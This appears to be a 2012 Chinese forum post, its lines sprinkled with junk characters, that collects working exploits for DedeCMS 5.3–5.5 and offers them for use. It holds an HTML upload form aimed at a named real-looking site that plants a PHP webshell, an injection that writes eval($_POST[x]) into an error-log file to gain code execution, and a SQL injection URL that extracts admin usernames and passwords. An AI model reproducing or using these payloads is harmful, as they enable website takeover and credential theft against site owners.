$ k, A \- u* w- b& |9 v2 a) Q( e/ {织梦(Dedecms)select_soft_post.php页面变量未初始漏洞4 |, ?. t: y; S: X; q( u* Y
<html>. `( }! B# p3 l8 N
<head>
/ K" b& ~) U0 z: [4 g<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>( g5 K, c0 |% C; D
</head>
4 k$ v) E( R$ c; N2 ?/ c<body style="FONT-SIZE: 9pt">
9 g1 ]) T7 q, W---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
3 N2 s4 j/ V4 S. F- U<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
' G9 l E4 e& i7 s$ c z<input type='hidden' name='activepath' value='/data/cache/' />" I' k2 x- o; d; Q' w! H2 F8 J
<input type='hidden' name='cfg_basedir' value='../../' />
6 a" V6 o. B9 F+ ?" N- _& V9 d<input type='hidden' name='cfg_imgtype' value='php' />
0 [' w. q$ E2 f: C4 ^( L: c9 |<input type='hidden' name='cfg_not_allowall' value='txt' />
G8 U' E# D" G Z1 C<input type='hidden' name='cfg_softtype' value='php' />7 w+ Q1 e" T y) K
<input type='hidden' name='cfg_mediatype' value='php' />
2 H! j' ]& k# Q; ~ p, X4 E4 L<input type='hidden' name='f' value='form1.enclosure' />5 a- q/ d% q8 O f' F
<input type='hidden' name='job' value='upload' />
$ t7 a! T$ {7 `<input type='hidden' name='newname' value='fly.php' />- p. r( F0 a# F" Q' x/ O( c
Select U Shell <input type='file' name='uploadfile' size='25' />! D% o7 ?* F+ y; R, D! O
<input type='submit' name='sb1' value='确定' />
6 A5 o0 Q7 o0 h</form># c0 t8 g& H* P1 z" l
<br />It's just a exp for the bug of Dedecms V55...<br />
5 ]( I4 M5 Y1 e$ b0 x& DNeed register_globals = on...<br />/ |/ s$ d& n4 `& F/ C! \
Fun the game,get a webshell at /data/cache/fly.php...<br />5 q) F! W9 q, }5 z* [
</body># N& W/ O/ S, Z$ }! w* A
</html>% _+ ~6 B% k# _0 H) Q' P
; {" C* u' O8 R8 h; ?8 i% V- q7 X) l0 J2 ?; x, _) V; ]- m
9 D) {2 h1 l, ], }9 C# V
( ^. j- n- M% J
+ }# j, ]* D+ {; v, K' ^8 Z. h+ d+ Y* ]' l
' K* W3 g2 ^6 w
' ]# [( M6 _1 l, z
8 D0 K4 D- q* n- M$ X* P
7 t9 \3 F8 y! ~0 y8 f! x织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
0 |. h1 d! V4 j( E; S利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。4 X+ [8 v2 x [. L" h$ {6 m1 i
1. 访问网址:
Y( c h$ x& Z. _ q( v: B) Jhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>, s \- ?: y5 A# V
可看见错误信息
1 B, ?' S& X* a5 J, `" B( [
, T" j! A; o2 o7 U( R- H, G2 T( v: ~3 i0 P4 v: W
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
! L- h( b$ J9 } T; R& Bint(3) Error: Illegal double '1024e1024' value found during parsing& @" v" l+ H9 H/ N& n7 `4 y
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?># i% E6 ^( a$ L9 W/ ~/ n
) a8 O0 W# w ?0 R+ f" H, e- w* Y) x# m1 q# o0 C+ M J
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
! M) {8 B7 ?' d6 W) _
5 H/ ]8 h0 R+ O9 u! y% F$ @' f. A* {
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>9 x) L6 n5 z4 e& A
, p# J. ~9 m/ ^% d& r& s+ y8 w' P0 ^9 y
按确定后的看到第2步骤的信息表示文件木马上传成功.
7 I( n1 K( E- q2 P# h0 w( V2 L9 x' |( @1 W, E8 J
4 A7 m8 C, P. L: P5 v
; c' Z! A C/ F
9 Y& d# h0 i' X9 i
+ ]" t% b/ b* V" N( P7 n
$ e3 y: y4 l: ^8 N; q
& }; y) e/ h, t5 G( v
d% O) T+ J( ^# y
& u7 o* l4 s: g9 u3 Q" m: B7 y P m; o
3 K$ ]5 K( X8 H, z2 F9 E) m2 A2 C$ l& J: n/ ^: _$ F5 \% M
1 @4 U* Z4 X9 h" u6 `4 T8 D织梦(DedeCms)plus/infosearch.php 文件注入漏洞$ g `6 s$ L- [' I6 X
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对